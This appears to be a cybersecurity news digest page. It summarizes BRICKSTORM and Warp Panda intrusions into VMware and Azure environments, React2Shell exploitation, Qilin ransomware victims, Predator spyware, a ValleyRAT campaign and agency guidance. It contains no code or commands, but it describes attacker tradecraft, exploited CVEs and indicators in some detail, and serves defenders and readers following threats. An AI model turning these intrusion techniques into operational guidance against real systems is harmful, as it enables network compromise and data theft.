CISA, NSA, and Canada's Cyber Centre issued a joint report on BRICKSTORM with IOCs, detection signatures, and recommended mitigations, highlighting its functionality for concealing communications, moving laterally, and tunneling into victim networks. CISA, which on Thursday released its analysis of eight BRICKSTORM samples from victim organizations, urges organizations that detect BRICKSTORM or related activity to contact it. Per CISA, BRICKSTORM is a sophisticated backdoor for VMware vSphere and Windows environments that provides interactive shell access and lets operators browse, upload, download, create, delete, and manipulate files. It supports HTTPS, WebSockets, and nested TLS for command-and-control, uses DNS-over-HTTPS (DoH) to conceal communications and blend in with normal traffic, can act as a SOCKS proxy to facilitate lateral movement, and uses multiple layers of encryption; a self-monitoring function automatically reinstalls or restarts it if it is disrupted. PRC actors are primarily targeting government and IT sector organizations. CISA did not disclose how many government agencies were impacted or what data was stolen. In a statement to Reuters, a spokesperson for the Chinese embassy in Washington rejected the accusations, saying the Chinese government does not "encourage, support or connive at cyber attacks."

In one intrusion CISA analyzed, the actors accessed a web server in an organization's DMZ in April 2024 using a web shell, moved laterally to an internal VMware vCenter server, and implanted BRICKSTORM after elevating their privileges, maintaining access from at least April 2024 through September 2025. They obtained service account credentials and used Remote Desktop Protocol (RDP) to reach a domain controller in the DMZ and capture Active Directory information, captured the Active Directory database, and performed system backups to harvest legitimate credentials and other sensitive data. A managed service provider (MSP) account obtained during the intrusion let them jump from the internal domain controller to the vCenter server. From the web server they also moved over Server Message Block (SMB) to two jump servers and an Active Directory Federation Services (ADFS) server, exporting cryptographic keys from the latter. The initial access vector and the date the web shell was deployed remain unknown. The activity continues the tactical evolution of Chinese groups, which keep striking edge network devices to breach networks and cloud infrastructure.

CrowdStrike linked these attacks to Warp Panda, believed active since at least 2022, which it has detected in multiple intrusions this year against VMware vCenter environments at U.S.-based legal, technology, and manufacturing entities; evidence shows initial access to one entity in late 2023. Warp Panda exhibits a high level of technical sophistication, advanced operations security (OPSEC), and extensive knowledge of cloud and virtual machine environments, and almost certainly focuses on maintaining persistent, long-term, covert access. Alongside BRICKSTORM it deploys two previously undocumented Go implants: Junction on ESXi hosts, an HTTP server that executes commands, proxies network traffic, and interacts with guest VMs through VM sockets (VSOCK), and GuestConduit on guest VMs, a traffic-tunneling implant that opens a VSOCK listener on port 5555 to relay communication between guest VMs and the hypervisor. Initial access involves exploiting internet-facing edge devices to pivot into vCenter environments, using either valid credentials or vCenter vulnerabilities; lateral movement uses SSH and the privileged vCenter management account "vpxuser", and SFTP is used to move data between hosts. Exploited vulnerabilities include:
  • CVE-2024-21887 (Ivanti Connect Secure)
  • CVE-2023-46805 (Ivanti Connect Secure)
  • CVE-2024-38812 (VMware vCenter)
  • CVE-2023-34048 (VMware vCenter)
  • CVE-2021-22005 (VMware vCenter)
  • CVE-2023-46747 (F5 BIG-IP)

The tradecraft revolves around stealth: clearing logs, timestomping files, creating rogue VMs that are shut down after use, and running BRICKSTORM disguised as benign vCenter processes to tunnel traffic through vCenter servers, ESXi hosts, and guest VMs. Like CISA, CrowdStrike observed the attackers using vCenter access to clone domain controller VMs, probably to harvest the Active Directory Domain Services database, and accessing the email accounts of employees working in areas that align with Chinese government interests. Warp Panda likely used one compromised network for rudimentary reconnaissance against an Asia Pacific government entity, and also connected to various cybersecurity blogs and a Mandarin-language GitHub repository.

CrowdStrike characterizes Warp Panda as a "cloud-conscious adversary" focused on persistence in cloud environments and access to sensitive data. The group used its access to victims' Microsoft Azure environments to reach data in OneDrive, SharePoint, and Exchange. In at least one incident it obtained user session tokens, likely by exfiltrating browser files, tunneled traffic through BRICKSTORM implants, and replayed the sessions against Microsoft 365 to download SharePoint files belonging to the organization's network engineering and incident response teams. For additional persistence it registered a new multi-factor authentication (MFA) device through an Authenticator app code after logging into a user account, and in another intrusion it used the Microsoft Graph API to enumerate service principals, applications, users, directory roles, and emails. The adversary primarily targets entities in North America and consistently maintains covert access, likely to support intelligence collection aligned with PRC strategic interests.

Chinese Hackers Exploit React2Shell Vulnerability (CVE-2025-55182) in Targeted Campaigns

Updated: · First: 05.12.2025 16:10 · 📰 1 src / 1 articles

Two China-linked hacking groups, Earth Lamia and Jackpot Panda, have begun exploiting the newly disclosed React2Shell vulnerability (CVE-2025-55182) in React Server Components, which allows unauthenticated remote code execution. The vulnerability was addressed in React versions 19.0.1, 19.1.2, and 19.2.1. The groups have targeted various sectors, including financial services, logistics, retail, IT, universities, and government organizations across Latin America, the Middle East, and Southeast Asia. The attacks involve running discovery commands, writing files, and reading sensitive information, demonstrating a systematic approach to exploiting multiple vulnerabilities simultaneously.

Qilin ransomware group targets multiple organizations, including South Korean financial sector

Updated: 05.12.2025 15:05 · First: 19.08.2025 17:25 · 📰 17 src / 21 articles

The Qilin ransomware group has been active, targeting multiple organizations, including Inotiv, a U.S.-based pharmaceutical company; Creative Box Inc. (CBI), a subsidiary of Nissan; Mecklenburg County Public Schools (MCPS); Asahi Group; and Synnovis, a UK pathology services provider. The latest attack was on the South Korean financial sector, where Qilin claims to have stolen over 1 million files and 2 TB of data from 28 victims. The attack on Asahi caused significant operational disruption, including a beer shortage in Japan. The group has also targeted other Japanese companies, including Shinko Plastics and Osaki Medical.

The Qilin ransomware group operates as a ransomware-as-a-service (RaaS) network, providing tools and infrastructure to affiliates and taking a 15–20% share of ransom payments; it has been observed operating in this model since 2023. The group's malware is custom-built in Rust and C for cross-platform attacks on Windows, Linux, and ESXi systems. The operation was first launched as "Agenda" in August 2022 and rebranded to Qilin by September 2022. Qilin has attacked more than 700 victims across 62 countries in 2025 and has published over 40 new victims per month in the second half of 2025. The operation uses the Windows Subsystem for Linux (WSL) to execute Linux encryptors on Windows systems, evading traditional security tools. Qilin has been observed exploiting unpatched VPN appliances and the lack of multi-factor authentication (MFA) to gain initial access to corporate networks, targeting small-to-medium-sized businesses in the construction, healthcare, and financial sectors, using new extortion channels including Telegram and public sites such as WikiLeaksV2, and collaborating with affiliates of the Scattered Spider group. Victims' data is published on dark-web leak sites if no ransom is paid.

Asahi Group Holdings confirmed that the personal data of approximately 1.914 million individuals, including 1.525 million customers, was or may have been exposed in the cyber-attack. The exposed data includes names, genders, dates of birth, postal addresses, email addresses, and phone numbers. Asahi Group Holdings spent two months investigating the breach, conducting root cause analysis and integrity checks, containing the ransomware, restoring systems, and strengthening security. Atsushi Katsuki, President and Group CEO of Asahi Group Holdings, publicly apologized for the difficulties caused by the disruptions, and the company is reviewing the potential impact of the incident on its financial results for fiscal year 2025. The Qilin ransomware group claimed responsibility for the attack. Asahi Group Holdings temporarily suspended its operations in Japan in late September following a system failure caused by the ransomware attack; the disruptions included order and shipment operations, call centers, and customer service desks, and the launch of a new product scheduled for October was postponed. On October 7, the Qilin ransomware group listed Asahi on its data leak site, claiming to have stolen 27 GB of files from the company.

Inotiv is notifying 9,542 individuals that their personal information was stolen in the August 2025 ransomware attack, and has restored availability and access to the impacted networks and systems. The Qilin ransomware group claimed responsibility for the breach in August 2025, leaked data samples, and said it exfiltrated over 162,000 files totaling 176 GB from Inotiv.

Louvre Launches €57m Security Overhaul After High-Profile Theft

Updated: · First: 05.12.2025 14:30 · 📰 1 src / 1 articles

The Louvre is investing €57m to renovate its security infrastructure following the theft of the Crown Jewels in October. The tender includes plans for a new digital safety management system, IT and physical security monitoring software, CCTV upgrades, access control mechanisms, and intrusion detection systems. The project aims to enhance cybersecurity and physical security while ensuring interoperability and scalability. The Louvre has set a deadline of December 10 for companies to apply and show interest in providing solutions. The modernization works will be carried out without suspending museum activities.

Predator Spyware Exploits Zero-Click Infection Vector via Malicious Ads

Updated: 05.12.2025 13:47 · First: 04.12.2025 22:47 · 📰 3 src / 4 articles

Predator spyware, developed by Intellexa, has been using a zero-click infection mechanism called Aladdin, which infects targets by displaying malicious advertisements. This vector is hidden behind shell companies across multiple countries and leverages the commercial mobile advertising system to deliver malware. The spyware is still operational and actively developed, with additional delivery vectors like Triton targeting Samsung Exynos devices. The infection occurs when a target views a malicious ad, which triggers a redirection to Intellexa’s exploit delivery servers. The ads are served through a complex network of advertising firms, making defense measures challenging. Despite sanctions and investigations, including fines from the Greek Data Protection Authority, Intellexa remains active and prolific in zero-day exploitation. Recent leaks reveal that Intellexa's Predator spyware has been marketed under various names, including Helios, Nova, Green Arrow, and Red Arrow. The spyware exploits multiple zero-day vulnerabilities in Android and iOS devices, and uses frameworks like JSKit for native code execution. Intellexa also has the capability to remotely access the surveillance systems of its customers using TeamViewer. The spyware collects extensive data from targeted devices, including messaging apps, calls, emails, device locations, screenshots, passwords, and other on-device information.

MSPs Adopt Trust-First Framework to Improve Cybersecurity Sales

Updated: · First: 05.12.2025 13:30 · 📰 1 src / 1 articles

Managed Service Providers (MSPs) are shifting their sales strategies to focus on building trust and understanding client needs, rather than traditional sales tactics. The guide "Getting to Yes: An Anti-Sales Guide for MSPs" outlines a trust-first framework to help MSPs overcome common objections and foster long-term partnerships. This approach emphasizes empathy, education, and evidence to demonstrate the business value of cybersecurity services.

React2Shell vulnerability exploited by China-linked threat actors

Updated: · First: 05.12.2025 13:26 · 📰 1 src / 1 articles

Multiple China-linked threat actors, including Earth Lamia and Jackpot Panda, have begun exploiting the critical React2Shell vulnerability (CVE-2025-55182) in React and Next.js. This insecure deserialization flaw allows unauthenticated remote execution of JavaScript code in the server's context. The vulnerability affects multiple versions of the widely used libraries, potentially exposing thousands of dependent projects. AWS reports active exploitation attempts within hours of the public disclosure, with attackers using a mix of public exploits and manual testing to refine their techniques.

Cloudflare service disruption causes widespread 500 Internal Server Errors

Updated: · First: 05.12.2025 11:01 · 📰 1 src / 1 articles

Cloudflare experienced a service disruption on December 5, 2025, leading to widespread 500 Internal Server Errors across websites relying on its infrastructure. The issue affected users attempting to access various sites, displaying server-side errors instead of the expected content. The disruption highlights the critical role of Cloudflare in maintaining the availability and security of numerous online services.

ArrayOS AG VPN Flaw Exploited to Deploy Webshells

Updated: 05.12.2025 07:40 · First: 05.12.2025 01:05 · 📰 2 src / 3 articles

Threat actors are exploiting a command injection vulnerability in Array AG Series VPN devices to plant webshells and create rogue users. The flaw, which affects ArrayOS AG 9.4.5.8 and earlier versions, was patched in May but lacks a CVE identifier. Attacks have been observed since at least August, targeting organizations in Japan. The vulnerability is linked to the 'DesktopDirect' remote access feature, and workarounds are available for those unable to update. The attacks have originated from the IP address 194.233.100[.]138. An authentication bypass flaw in the same product (CVE-2023-28461, CVSS score 9.8) was exploited last year by a China-linked cyber espionage group dubbed MirrorFace, which has a history of targeting Japanese organizations since at least 2019.

China-Based Phishing Groups Expand to Fake E-Commerce Sites and Tax Refund Lures

Updated: · First: 05.12.2025 01:02 · 📰 1 src / 1 articles

China-based phishing groups have expanded their operations to include fake e-commerce websites and SMS lures promising unclaimed tax refunds and mobile rewards points. These groups, previously known for non-stop scam SMS messages about packages or unpaid toll fees, are now using phishing kits to create convincing fake e-commerce sites that convert customer payment card data into mobile wallets from Apple and Google. The phishing domains are promoted via SMS messages sent through Apple’s iMessage or Google’s RCS messaging service. The phishing websites ask for the visitor’s name, address, phone number, and payment card data to claim the points. If card data is submitted, the site prompts the user to share a one-time code sent via SMS by their financial institution. This code is used to enroll the victim’s phished card details in a mobile wallet controlled by the fraudsters. Experts note that these phishing kits have been used in other geographies like the EU and Asia but are now targeting consumers in the United States.

UK NCSC Launches Proactive Notifications for Vulnerability Alerts

Updated: · First: 05.12.2025 00:21 · 📰 1 src / 1 articles

The UK's National Cyber Security Centre (NCSC) has introduced a pilot service called Proactive Notifications to alert organizations about vulnerabilities in their exposed devices. The service identifies unpatched vulnerabilities and weak security configurations using public data and internet scans, then recommends specific software updates or security improvements. The pilot program targets UK domains and IP addresses, but it is not exhaustive and should not replace other security alerts. Organizations are encouraged to also use the NCSC's Early Warning service for real-time threat notifications.

Russia Blocks FaceTime and Snapchat Over Terrorism Concerns

Updated: · First: 04.12.2025 21:12 · 📰 1 src / 1 articles

Russia has blocked access to Apple's FaceTime and Snapchat, citing their use in coordinating terrorist attacks, recruiting criminals, and committing fraud. Roskomnadzor, the Russian telecommunications watchdog, announced the blocking of these platforms, stating they are being used to organize terrorist activities and other crimes against Russian citizens. Snapchat was blocked on October 10, while FaceTime's blocking was announced on December 4. Additionally, Russia has previously banned other platforms like Viber and Signal for similar reasons.

Silver Fox Exploits Microsoft-Signed WatchDog Driver to Deploy ValleyRAT Malware

Updated: 04.12.2025 19:25 · First: 02.09.2025 11:39 · 📰 2 src / 3 articles

The threat actor Silver Fox has been exploiting a previously unknown vulnerable driver associated with WatchDog Anti-malware to deploy ValleyRAT malware. The driver, 'amsdk.sys' (version 1.0.600), is a validly signed Windows kernel device driver built on the Zemana Anti-Malware SDK. It allows arbitrary process termination and local privilege escalation, enabling the attackers to neutralize endpoint protection products and deploy the ValleyRAT remote access trojan. The campaign, first observed in late May 2025, targets Chinese-speaking victims using various social engineering techniques and trojanized software. The WatchDog driver has been patched, but attackers have adapted by modifying the driver to bypass hash-based blocklists. Silver Fox, also known as SwimSnake and UTG-Q-1000, is highly active and organized, targeting domestic users and companies to steal secrets and defraud victims.

Recently, Silver Fox has been spotted orchestrating a false flag operation to mimic a Russian threat group in attacks targeting organizations in China. The campaign leverages Microsoft Teams lures to trick users into downloading a malicious setup file that leads to the deployment of ValleyRAT (Winos 4.0); the activity has been underway since November 2025. The malicious setup file is a ZIP archive named "MSTчamsSetup.zip" retrieved from an Alibaba Cloud URL. The malware scans running processes for binaries related to 360 Total Security, configures Microsoft Defender Antivirus exclusions, and writes a trojanized version of the Microsoft installer to the "AppData\Local\" path. It also writes additional files, including "AppData\Local\Profiler.json," "AppData\Roaming\Embarcadero\GPUCache2.xml," "AppData\Roaming\Embarcadero\GPUCache.xml," and "AppData\Roaming\Embarcadero\AutoRecoverDat.dll." The malware loads data from "Profiler.json" and "GPUcache.xml," and launches the malicious DLL into the memory of "rundll32.exe." It then establishes a connection to an external server to fetch the final payload that facilitates remote control.

Silver Fox's objectives include financial gain through theft, scams, and fraud, alongside the collection of sensitive intelligence for geopolitical advantage. The disclosure comes as Nextron Systems highlighted another ValleyRAT attack chain that uses a trojanized Telegram installer as the starting point of a multi-stage process that ultimately delivers the trojan.

Former Contractors Accused of Wiping 96 U.S. Government Databases

Updated: · First: 04.12.2025 18:30 · 📰 1 src / 1 articles

Two former federal contractors, Muneeb and Sohaib Akhter, have been charged with conspiring to steal sensitive information and destroy government databases after being fired. The brothers allegedly deleted 96 databases containing U.S. government information, including Freedom of Information Act records and sensitive investigative documents. They also attempted to cover their tracks by wiping system logs and company laptops.

CISA and International Partners Publish Guide for Secure AI Integration in OT Systems

Updated: 04.12.2025 18:30 · First: 03.12.2025 14:00 · 📰 3 src / 3 articles

The Cybersecurity and Infrastructure Security Agency (CISA) and the Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC), along with international partners, have released a joint guide outlining principles for securely integrating Artificial Intelligence (AI) into Operational Technology (OT) environments. The guide provides four key principles to help critical infrastructure owners and operators mitigate risks and ensure the safe adoption of AI in OT systems. The guide emphasizes the need for understanding AI risks, assessing its use in OT, establishing governance frameworks, and embedding safety and security measures. It focuses on machine learning (ML)- and large language model (LLM)-based AI, but can also be applied to systems using traditional statistical modeling and logic-based automation. The guide provides examples of AI use cases in OT environments, including field devices, PLCs, RTUs, SCADA, DCS, and HMI systems, and highlights the risks associated with AI integration, such as system compromise, disruptions, financial loss, and functional safety impact. Additionally, the guidance emphasizes protecting sensitive OT data, including engineering configuration information and ephemeral data, and addresses the challenges of integrating AI into legacy OT systems.

Password Security Best Practices for Operational Technology (OT) Systems

Updated: · First: 04.12.2025 17:11 · 📰 1 src / 1 articles

Operational Technology (OT) systems, which control critical infrastructure such as energy plants and manufacturing facilities, face unique cybersecurity challenges due to their direct interaction with physical systems. These challenges include outdated hardware, shared accounts, remote access vulnerabilities, and the increasing intermingling of IT and OT systems. Strong password policies are essential to mitigate these risks, as weak passwords can lead to severe consequences, including physical dangers and operational disruptions.

UK and Canadian Cyber Agencies Publish Report on Digital Content Provenance

Updated: · First: 04.12.2025 17:00 · 📰 1 src / 1 articles

The UK’s National Cyber Security Centre (NCSC) and Canada’s Centre for Cyber Security (CCCS) have released a report on digital content provenance to combat the spread of misleading information in the era of generative AI. The report emphasizes the need for organizations to improve the public provenance of their information to build trust. It explores the emerging field of content provenance technologies and offers strategies to manage associated risks. The report also highlights the challenges in developing and implementing these technologies, including the burden placed on end users to understand provenance data.

GhostFrame Phishing Framework Exploits Iframe Architecture for Over One Million Attacks

Updated: · First: 04.12.2025 16:30 · 📰 1 src / 1 articles

A new phishing framework named GhostFrame has been linked to over one million attacks. Built around a stealthy iframe architecture, GhostFrame conceals malicious behavior within embedded iframes, allowing attackers to evade detection and dynamically adjust phishing content. The framework employs anti-analysis controls and randomized subdomains to maintain stealth and ensure attack continuity. GhostFrame's attack chain involves a benign-looking outer page that loads a secondary phishing page within an iframe, which contains the actual credential-harvesting components. The framework's emails vary widely in themes, including fake contract notices, HR updates, and password reset requests.

Microsoft 365 Desktop App Installation Blocked Due to Authentication Misconfiguration

Updated: 04.12.2025 15:18 · First: 17.11.2025 16:54 · 📰 2 src / 3 articles

Microsoft is addressing a bug preventing installation of Microsoft 365 desktop apps on Windows devices. The issue stems from misconfigured authentication components in versions 2508 (Build 19127.20358) and 2507 (Build 19029.20294). The bug has been impacting users since November 2nd, causing Office Client issues. Microsoft has developed and is testing a fix, with an update on progress expected by 6:30 PM UTC today. The incident, tagged as OP1192004, is considered critical with noticeable user impact. Additionally, Microsoft is resolving a separate issue (MO1176905) affecting access to multiple Microsoft 365 services for some admins and users.

CISA Launches Industry Engagement Platform for Enhanced Collaboration

Updated: · First: 04.12.2025 14:00 · 📰 1 src / 1 articles

The Cybersecurity and Infrastructure Security Agency (CISA) has launched the Industry Engagement Platform (IEP) to facilitate structured, two-way communication between the agency and companies developing innovative security technologies. The platform aims to improve understanding of emerging solutions across the technology ecosystem and provide a transparent pathway for industry engagement. The IEP allows organizations to request conversations with CISA subject matter experts to present new technologies and capabilities that could strengthen national cyber and infrastructure security. Participation in the IEP does not provide preferential consideration for future federal contracts but serves as a key channel for CISA to gain insight into new capabilities and market trends.